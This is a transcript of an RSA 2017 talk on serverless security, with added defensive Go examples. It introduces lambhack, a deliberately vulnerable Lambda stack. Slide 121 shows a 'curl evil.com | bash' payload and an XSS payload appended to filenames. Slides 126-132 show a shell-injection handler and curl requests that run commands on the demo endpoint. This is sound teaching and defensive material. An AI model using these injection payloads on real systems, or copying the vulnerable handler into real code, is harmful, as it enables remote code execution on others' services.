Serverless Security: Are you ready for the Future?

Talk from RSA 2017 on Serverless Security and the 4 areas of growth for security in the world of serverless. In this talk, there is also the first release of lambhack, an open source, vulnerable lambda-based serverless stack demoing arbitrary code execution in lambda.

  1. #RSAC SESSION ID: ASD-F01. James Wickett, Head of Research, Signal Sciences, @wickett. Serverless Security: Are you ready for the Future?
  2. James Wickett: Head of Research at Signal Sciences; author of DevOps Fundamentals at lynda.com; author of a book on DevOps (email me for a free copy: james@signalsciences.com); blogger at theagileadmin.com and labs.signalsciences.com
  3. Conclusion: Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation. New serverless patterns are just emerging. Security with serverless is easier. Security with serverless is harder.
  4. Conclusion (2): Four key areas apply to serverless security: Software Supply Chain Security, Delivery Pipeline Security, Data Flow Security, Attack Detection. New! A very vulnerable lambda stack open source project: github.com/wickett/lambhack
  5. What is Serverless?
  6. Misconceptions
  7. It's Marketing (cloud rebranded)
  8. Serverless == no servers
  9. Serverless == Backend as a Service
  10. Serverless == Platform as a Service
  11. TK: AdrianCO quote
  12. So, what is Serverless?
  13. http://martinfowler.com/articles/serverless.html
  14. @mikebroberts
  15. "Serverless was first used to describe applications that significantly or fully depend on 3rd party applications / services ('in the cloud') to manage server-side logic and state." http://martinfowler.com/articles/serverless.html
  16. "Serverless can also mean applications where some amount of server-side logic is still written by the application developer but unlike traditional architectures is run in stateless compute containers that are event-triggered, ephemeral (may only last for one invocation), and fully managed by a 3rd party." http://martinfowler.com/articles/serverless.html
  17. History of Serverless: 2012 - used to describe BaaS and Continuous Integration services run by third parties; Late 2014 - AWS launched Lambda; July 2015 - AWS launched API Gateway; October 2015 - AWS re:Invent - The Serverless company using AWS Lambda; 2015 to present - Frameworks forming; 2016 - Serverless Conference. http://www.slideshare.net/AmazonWebServices/arc308-the-serverless-company-using-aws-lambda
  18. Old School Arch (diagram labels): Client, Proxy/LB, Server, Server, Server, Database
  19. Serverless Arch (diagram labels): Client, Auth Service, API Gateway, Function A, Function B, Database, Service, Web Delivery
  20. (no text)
  21. What can we say is serverless?
  22. Serverless is Functions As a Service (FaaS)
  23. Containers on Demand
  24. Serverless is (no management of) Servers
  25. Serverless IS SERVICEFULL
  26. Serverless is an opinionated framework for compute
  27. Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation.
  28. A Short History of Cloud
  29. Virtualization
  30. "The Cloud"
  31. DEVOPS
  32. SaaS, PaaS, IaaS
  33. Private Cloud
  34. Then, along came containers
  35. containers are teh hawtness
  36. (no text)
  37. Lots of effort in Container Orchestration
  38. The Cloud was to Virtualization as Serverless will be to Containers
  39. "If you want to lead your company bravely into the new world, you would do well to focus a lot on how serverless will evolve." - @Cloudopinion, https://medium.com/@cloud_opinion/the-pattern-may-repeat-26de1e8b489d
  40. Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation.
  41. So, what are the upsides?
  42. Scaling built in
  43. Pay for what you use, in 100 ms increments
  44. With Serverless, system administration is (mostly) lower
  45. Serverless is implicit Microservices
  46. Short-circuits Ops and moves the infrastructure runtime closer to devs
  47. You can skip Chefing and Dockering all the things!
  48. Lean Startup Friendly
  49. Increased Velocity
  50. Great, what's the catch?
  51. Ops burden to rationalize the Serverless model (specifically Deploy)
  52. Monitoring
  53. Logging
  54. Stateless for real, with no persistence* across function runs
  55. Vendor Lock-In
  56. Security
  57. Reliability
  58. (no text)
  59. Serverless Use cases
  60. Image resizing
  61. Queue processing. http://martinfowler.com/articles/serverless.html
  62. Run a web application
  63. API Gateway. http://martinfowler.com/articles/serverless.html
  64. CI/CD
  65. Security is the same and different
  66. What used to be system calls is now distributed computing over the network
  67. Serverless shifts attack surface to third parties
  68. Let's try a sample application in AWS
  69. Go Sparta: Golang! AWS Lambda supports bring-your-own-binary; Sparta wraps your binary with a node.js shim
  70. (no text)
  71. Other options: Serverless Framework, APEX, Kappa
  72. Wordy: analyzes textual occurrences; given a block of text, returns a JSON count of words; calls an API under the hood to get the text; it is comprised of Lambda, S3 and API Gateway
  73. (no text)
  74. (no text)
  75. (no text)
  76. go run main.go provision -s S3_BUCKET
  77. to 85. (no text)
  86. What I learned about serverless security
  87. (no text)
  88. Security
  89. Four areas of Serverless Security: Secure Software Supply Chain; Delivery Pipeline; Data Flow Security; Attack Detection
  90. Secure Software Supply Chain
  91. Surface area Reduction!
  92. Surface area Expansion!
  93. SSL / TLS from the Provider
  94. New Way / Old Way (diagram)
  95. Routing from the provider
  96. Old Way / New Way (diagram)
  97. (no text)
  98. Lambda + S3 + Kinesis + DynamoDB + CloudFormation + API Gateway + Auth0
  99. Abuse of open IAM privs. https://media.ccc.de/v/33c3-7865-gone_in_60_milliseconds
  100. Recommendation: Use a third-party service to monitor for provider config changes
  101. Provider Security: Disable root access keys; Manage users with profiles; Secure your keys in your deploy system; Secure keys in the dev system; Use provider MFA
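Slides 99 to 101 name the problem (open IAM privileges) and the controls (monitor provider configuration, lock down keys) without showing what a check looks like. The Go program below is an added example, not code from the talk or from the lambhack project: a small linter over an IAM policy document that flags Allow statements granting Action "*", a whole-service wildcard such as "kinesis:*", or Resource "*". The policy it runs on is constructed for the demo (made-up ARNs and statement IDs), and the StringList decoder exists because IAM accepts either a string or a list in the Action and Resource fields.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

// StringList decodes an IAM field that may be a single string or a list,
// e.g. "Action": "s3:GetObject" or "Action": ["s3:GetObject", "s3:PutObject"].
type StringList []string

func (s *StringList) UnmarshalJSON(b []byte) error {
	var one string
	if err := json.Unmarshal(b, &one); err == nil {
		*s = StringList{one}
		return nil
	}
	var many []string
	if err := json.Unmarshal(b, &many); err != nil {
		return err
	}
	*s = StringList(many)
	return nil
}

// Statement and Policy cover only the fields this linter inspects.
type Statement struct {
	Sid      string     `json:"Sid"`
	Effect   string     `json:"Effect"`
	Action   StringList `json:"Action"`
	Resource StringList `json:"Resource"`
}

type Policy struct {
	Version   string      `json:"Version"`
	Statement []Statement `json:"Statement"`
}

// Finding is one overly broad grant, keyed by the statement's Sid.
type Finding struct {
	Sid    string
	Reason string
}

// AuditPolicy flags Allow statements whose Action is "*" or a service-wide
// wildcard ("kinesis:*"), or whose Resource is "*". Deny statements,
// Condition blocks and NotAction are not evaluated, so hits are leads to
// review, not verdicts.
func AuditPolicy(doc []byte) ([]Finding, error) {
	var p Policy
	if err := json.Unmarshal(doc, &p); err != nil {
		return nil, fmt.Errorf("parse policy: %w", err)
	}
	var findings []Finding
	for _, st := range p.Statement {
		if !strings.EqualFold(st.Effect, "Allow") {
			continue
		}
		for _, a := range st.Action {
			switch {
			case a == "*":
				findings = append(findings, Finding{st.Sid, "Action is *"})
			case strings.HasSuffix(a, ":*"):
				findings = append(findings, Finding{st.Sid, "Action is service-wide wildcard " + a})
			}
		}
		for _, r := range st.Resource {
			if r == "*" {
				findings = append(findings, Finding{st.Sid, "Resource is *"})
			}
		}
	}
	return findings, nil
}

// SamplePolicy is a constructed policy document for the demo; the ARNs,
// account id and statement ids are made up.
const SamplePolicy = `{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "ReadBucket", "Effect": "Allow",
     "Action": ["s3:GetObject"], "Resource": "arn:aws:s3:::example-bucket/*"},
    {"Sid": "TooBroad", "Effect": "Allow", "Action": "*", "Resource": "*"},
    {"Sid": "StreamAll", "Effect": "Allow",
     "Action": "kinesis:*", "Resource": "arn:aws:kinesis:us-east-1:123456789012:stream/example"},
    {"Sid": "DenyDelete", "Effect": "Deny", "Action": "*", "Resource": "*"}
  ]
}`

func main() {
	findings, err := AuditPolicy([]byte(SamplePolicy))
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("%-10s %s\n", f.Sid, f.Reason)
	}
}
```

Point it at the policies attached to the deploy role and to each function's execution role; the Deny statement in the sample is skipped on purpose, since a linter this coarse cannot tell whether a Deny elsewhere narrows an Allow, which is exactly why the slide also recommends continuous monitoring of provider configuration rather than a one-off review.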
  102. Delivery Pipeline Security
  103. (no text)
  104. Unit Testing
  105. Easier to mock / Harder to mock
  106. (no text)
  107. Integration Testing
  108. Configuration is part of delivery
  109. (no text)
  110. Simple Deploy Pipeline Security: Only dev keys can push to 'dev'; Only the build/deploy system can push to pre-prod; Integration tests must pass in this env; Security validation must take place; Allow push to prod only by the deploy system
  111. Security Integration Testing: BDD-Security - github.com/continuumsecurity/bdd-security; Gauntlt - gauntlt.org
  112. http://www.slideshare.net/wickett/pragmatic-security-and-rugged-devops-sxsw-2015
  113. Data Flow Security: Development (Data Flow Diagrams, Threat modeling); Runtime
  114. "Your provider is responsible for the underlying infrastructure and services. You are responsible for ensuring you use the services in a secure manner." https://read.acloud.guru/adopting-serverless-architectures-and-security-254a0c12b54a
  115. Application layer DoS
  116. Timeouts and Execution restrictions
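Slides 115 and 116 pair application-layer DoS with timeouts and execution restrictions: in a pay-per-100 ms model, a request that keeps an invocation busy is a cost as well as an availability problem. The Go below is an added example, not code from the talk or from the Wordy sample; it shows the shape of a word-counting handler that enforces its own limits rather than relying only on the platform timeout: a byte cap checked while the body streams, and a context deadline shorter than the platform's so a client that trickles bytes cannot hold the function open for its whole budget. slowReader and the sample inputs are constructed for the demo.

```go
package main

import (
	"context"
	"errors"
	"fmt"
	"io"
	"strings"
	"time"
)

// ErrTooLarge is returned when a body exceeds the configured byte budget.
var ErrTooLarge = errors.New("request body exceeds size limit")

// countWordsLimited counts whitespace-separated words from body, refusing
// anything larger than maxBytes and stopping as soon as ctx expires.
func countWordsLimited(ctx context.Context, body io.Reader, maxBytes int64) (int, error) {
	// Read one byte past the budget so "exactly maxBytes" and "over" are distinguishable.
	limited := io.LimitReader(body, maxBytes+1)
	buf := make([]byte, 4096)
	var total int64
	words, inWord := 0, false
	for {
		// Check the deadline between reads: a trickling client must not be
		// able to keep the invocation alive for the platform's full timeout.
		select {
		case <-ctx.Done():
			return 0, ctx.Err()
		default:
		}
		n, err := limited.Read(buf)
		total += int64(n)
		if total > maxBytes {
			return 0, ErrTooLarge
		}
		for _, b := range buf[:n] {
			switch b {
			case ' ', '\n', '\t', '\r':
				inWord = false
			default:
				if !inWord {
					inWord = true
					words++
				}
			}
		}
		if err == io.EOF {
			return words, nil
		}
		if err != nil {
			return 0, err
		}
	}
}

// HandleWordCount is the function entry point. budget should be set below
// the platform's configured timeout so the function fails fast and cheaply
// instead of being killed at the limit.
func HandleWordCount(body io.Reader, maxBytes int64, budget time.Duration) (int, error) {
	ctx, cancel := context.WithTimeout(context.Background(), budget)
	defer cancel()
	return countWordsLimited(ctx, body, maxBytes)
}

// slowReader is a constructed client that delivers one byte per Read after
// a pause, modelling a body that trickles in to stall the function.
type slowReader struct {
	delay time.Duration
	left  int
}

func (s *slowReader) Read(p []byte) (int, error) {
	if s.left == 0 {
		return 0, io.EOF
	}
	time.Sleep(s.delay)
	s.left--
	p[0] = 'x'
	return 1, nil
}

func main() {
	n, err := HandleWordCount(strings.NewReader("the quick brown fox"), 1024, time.Second)
	fmt.Println(n, err) // 4 <nil>
	_, err = HandleWordCount(strings.NewReader(strings.Repeat("x ", 1000)), 1024, time.Second)
	fmt.Println(err) // request body exceeds size limit
	_, err = HandleWordCount(&slowReader{delay: 50 * time.Millisecond, left: 100}, 1024, 20*time.Millisecond)
	fmt.Println(err) // context deadline exceeded
}
```

The size check runs as the body streams rather than after reading it whole, so an oversized request is rejected before it occupies memory; the deadline is checked between reads because a blocked Read cannot be interrupted by the context on its own.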
  117. Attack Detection
  118. https://medium.com/@PaulDJohnston/security-and-serverless-ec52817385c4
  119. AppSec Greatest Hits (XSS, SQLi, Cmdexe) still relevant 15 years later!
  120. AppSec Problems
  121. Types of Attacks: XSS, Injection, Deserialization, … New surface area, similar problems, e.g. appending 'curl evil.com | bash' or <script>alert(1)</script> to a filename you upload on S3
  122. Defense: Logging, emitting events; Vandium (SQLi) wrapper; Content Security Policy (CSP); More things need to be done here…
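Slide 121's example is a filename with `<script>alert(1)</script>` or `curl evil.com | bash` appended and uploaded to S3; slide 122's defenses are logging and emitting events, and CSP. The Go below is an added example, not code from the talk or from lambhack, that applies those defenses to that input: an allowlist check on the upload name, a structured input_rejected log line that a detection pipeline can alert on, HTML escaping when names are rendered, and a starting CSP value. Function names, the event's field names and the sample names are assumed or constructed.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
	"html"
	"path"
	"regexp"
	"strings"
	"time"
)

// ErrUnsafeFilename is returned for any upload name outside the allowlist.
var ErrUnsafeFilename = errors.New("filename rejected by allowlist")

// safeName: a single path segment that starts alphanumeric, uses only
// [A-Za-z0-9._-], and is at most 255 bytes. Every character the slide's
// payloads depend on ('<', '>', '|', space, '/') is outside the set, so this
// is an allowlist, not a blocklist of known-bad strings.
var safeName = regexp.MustCompile(`^[A-Za-z0-9][A-Za-z0-9._-]{0,254}$`)

// ValidateUploadName returns the name unchanged when it is safe to use as an
// S3 key and as a filename downstream, and ErrUnsafeFilename otherwise.
func ValidateUploadName(name string) (string, error) {
	// path.Base strips directories: if it changes the value, the input had a
	// "/" or was empty or "..", none of which belong in a key we construct.
	if path.Base(name) != name || strings.Contains(name, "..") || !safeName.MatchString(name) {
		return "", ErrUnsafeFilename
	}
	return name, nil
}

// SecurityEvent is the structured record a function writes to its log so a
// detection pipeline can alert on rejected input (field names assumed).
type SecurityEvent struct {
	Time     string `json:"time"`
	Kind     string `json:"kind"`
	Function string `json:"function"`
	Input    string `json:"input"`
	Reason   string `json:"reason"`
}

// RejectEvent renders an input_rejected event as one JSON line. The raw
// input is kept (JSON-escaped) so an analyst can see the payload, but
// truncated so a huge value cannot flood the log.
func RejectEvent(function, input, reason string) string {
	const maxInput = 256
	if len(input) > maxInput {
		input = input[:maxInput] + "...(truncated)"
	}
	b, _ := json.Marshal(SecurityEvent{
		Time:     time.Now().UTC().Format(time.RFC3339),
		Kind:     "input_rejected",
		Function: function,
		Input:    input,
		Reason:   reason,
	})
	return string(b)
}

// RenderListing builds the HTML fragment that lists stored object names.
// Names are escaped on output regardless of what validation did on input,
// so a key written through some other path still cannot become script.
func RenderListing(names []string) string {
	var sb strings.Builder
	sb.WriteString("<ul>")
	for _, n := range names {
		sb.WriteString("<li>")
		sb.WriteString(html.EscapeString(n))
		sb.WriteString("</li>")
	}
	sb.WriteString("</ul>")
	return sb.String()
}

// CSPHeaderValue is served with the listing: no inline script, same-origin
// sources only. A starting point to tighten per application, not a universal policy.
const CSPHeaderValue = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'"

func main() {
	for _, name := range []string{"report.pdf", "x<script>alert(1)</script>.png", "../etc/passwd"} {
		if _, err := ValidateUploadName(name); err != nil {
			fmt.Println(RejectEvent("wordy-upload", name, err.Error()))
			continue
		}
		fmt.Println("accepted:", name)
	}
	fmt.Println(RenderListing([]string{"report.pdf", "x<script>alert(1)</script>.png"}))
}
```

The three layers are independent on purpose: validation stops the bad key from being created, escaping stops an existing bad key from executing in a page, and the event gives the detection side something to count and alert on; CSP then limits what an escaped-but-missed case could do in the browser.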
  123. New Thing Alert! Want to make the point that appsec is still relevant in serverless. A vulnerable Lambda + API Gateway stack (born from the heritage of WebGoat, Rails Goat and Gruyere, …). Introducing lambhack
  124. (no text)
  125. lambhack: A Vulnerable Lambda + API Gateway stack; Open Source, MIT licensed; Released for the first time here at RSA; Includes arbitrary code execution in a query string; More work needed, PRs accepted and looking for community help. github.com/wickett/lambhack
  126. Vulnerable code is also vulnerable in Serverless:
       //command := lambdaEvent.PathParams["command"]
       command := lambdaEvent.QueryParams["args"]
       output := runner.Run(command)
  127. Let's take a look at cmdexe in lambhack
  128. $ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/c?args=uname+-a;+sleep+1"
       > Linux ip-10-36-34-119 4.4.35-33.55.amzn1.x86_64 #1 SMP Tue Dec 6 20:30:04 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
       (slide caption: uname -a)
  129. $ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/c?args=cat+/proc/version;+sleep+1"
       > Linux version 4.4.35-33.55.amzn1.x86_64 (mockbuild@gobi-build-60006) (gcc version 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) SMP Tue Dec 6 20:30:04 UTC 2016
       (slide caption: cat /proc/version)
  130. $ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/c?args=ls+-la+/tmp;+sleep+1"
       total 17916
       drwx------ 2 sbx_user1056 490 4096 Feb 8 22:02 .
       drwxr-xr-x 21 root root 4096 Feb 8 21:47 ..
       -rwxrwxr-x 1 sbx_user1056 490 18334049 Feb 8 22:02 Sparta.lambda.amd64
       (slide caption: Let's see /tmp)
  131. $ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/c?args=ls+/tmp;+sleep+1"
       $ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/ pargs=touch+/tmp/wickettfile;+sleep+1"
       $ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/args=ls+/tmp;+sleep+1"
       > Sparta.lambda.amd64 wickettfile
       (slide caption: Lambda Reuse!)
  132. $ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/c?args=which+curl;+sleep+1"
       > /usr/bin/curl
       (slide caption: Could we upload our own payload?)
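Slide 126 shows the lambhack handler passing the args query parameter straight to a runner, and slides 128 to 132 show what follows, including that files in /tmp survive across warm invocations. The Go below is an added example and not lambhack's own code (lambdaEvent's type, the runner and the operation names are assumed): the vulnerable shape beside a hardened version that maps a request to a fixed argv from an allowlist and execs it without a shell, plus a per-invocation scratch directory that is removed before the handler returns, which is the container-reuse point from slide 131.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"os/exec"
	"path/filepath"
)

// lambdaEvent models the request object the slide's handler reads from;
// the field name QueryParams is from the slide, the type is assumed.
type lambdaEvent struct {
	QueryParams map[string]string
}

// vulnerableRun is the slide 126 pattern: whatever arrived in ?args= is
// handed to a shell, so "uname -a; sleep 1" runs two commands. Kept only
// for contrast with the hardened version below; never called here.
func vulnerableRun(ev lambdaEvent) ([]byte, error) {
	return exec.Command("/bin/sh", "-c", ev.QueryParams["args"]).CombinedOutput()
}

var ErrNotAllowed = errors.New("operation not in allowlist")

// allowedOps maps the only operations the endpoint exposes to fixed argv
// vectors. The request selects an entry by exact name; no request byte
// ever reaches a shell or becomes an argument.
var allowedOps = map[string][]string{
	"kernel":   {"uname", "-r"},
	"hostname": {"hostname"},
	"tmpusage": {"du", "-sh", "/tmp"},
}

// ResolveOp turns ?op=<name> into an argv, or ErrNotAllowed. Anything that
// is not an exact key (including "kernel; sleep 1") falls through to the error.
func ResolveOp(ev lambdaEvent) ([]string, error) {
	argv, ok := allowedOps[ev.QueryParams["op"]]
	if !ok {
		return nil, ErrNotAllowed
	}
	return append([]string(nil), argv...), nil // copy so callers cannot mutate the table
}

// HardenedRun executes the resolved argv directly (exec, not a shell), so
// ";", "|" and "$()" in the request are never interpreted.
func HardenedRun(ev lambdaEvent) ([]byte, error) {
	argv, err := ResolveOp(ev)
	if err != nil {
		return nil, err
	}
	return exec.Command(argv[0], argv[1:]...).CombinedOutput()
}

// WithScratchDir addresses the "Lambda reuse" slide: /tmp persists across
// warm invocations, so per-request files go in a fresh directory that is
// removed before the handler returns, leaving nothing behind for the next
// request served by the same container.
func WithScratchDir(fn func(dir string) error) error {
	dir, err := os.MkdirTemp("", "invocation-")
	if err != nil {
		return err
	}
	defer os.RemoveAll(dir)
	return fn(dir)
}

func main() {
	out, err := HardenedRun(lambdaEvent{QueryParams: map[string]string{"op": "kernel"}})
	fmt.Printf("%s %v\n", out, err)
	_, err = HardenedRun(lambdaEvent{QueryParams: map[string]string{"args": "uname -a; sleep 1"}})
	fmt.Println(err) // operation not in allowlist
	err = WithScratchDir(func(dir string) error {
		return os.WriteFile(filepath.Join(dir, "work.txt"), []byte("per-invocation data"), 0o600)
	})
	fmt.Println(err)
}
```

The allowlist is the load-bearing part: once the request can only pick a name, there is nothing to sanitize, and a rejected op is also a clean signal to log and alert on. The scratch directory does not make the function stateless, but it stops one invocation's artifacts from being visible to the next, which is what the wickettfile demonstration relied on.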
  133. XSS, SQLi, … More to come!
  134. Email me if you are interested: james@signalsciences.com
  135. Conclusion: Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation. New serverless patterns are just emerging. Security with serverless is easier. Security with serverless is harder.
  136. Conclusion (2): Four key areas apply to serverless security: Software Supply Chain Security, Delivery Pipeline Security, Data Flow Security, Attack Detection. New! A very vulnerable lambda stack open source project: github.com/wickett/lambhack
  137. (no text)
  138. Let's talk! James Wickett, james@signalsciences.com, @wickett
